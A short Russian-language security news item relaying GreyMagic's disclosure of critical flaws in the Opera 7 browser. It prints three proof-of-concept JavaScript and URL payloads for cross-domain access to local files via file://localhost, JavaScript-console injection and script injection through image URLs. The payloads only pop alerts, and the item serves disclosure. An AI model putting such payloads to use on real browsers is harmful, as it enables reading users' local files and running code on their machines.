GreyMagic обнаружило несколько критических
уязвимостей в только что появившемся
броузере Opera 7.
- Программа позволяет скриптам
обращаться к данным других доменов, что
позволяет атакующем читать локальные
файлы:
<script language="jscript">
var
oWin=open("file://localhost/console.html","","");
oWin.setInterval=function ()
{
alert("Access to local resource achieved:
"+oWin.document.location.href);
}
</script> - Недостаток в JavaScript консоли позволяет
получать доступ к произвольным файлам на
машине клиента:
open("file://localhost/console.html","","");
opera.postError("http://\"style=\"background-image:url('javascript:alert(location.href)')\""); - Opera неправильно интерпретирует картинки,
что так же позволяет получить полный
доступ к компьютеру:
open("file://localhost/images/file.gif?\">
<script>alert(location.href);
</script>","","");
Подробности на сайте http://security.greymagic.com/.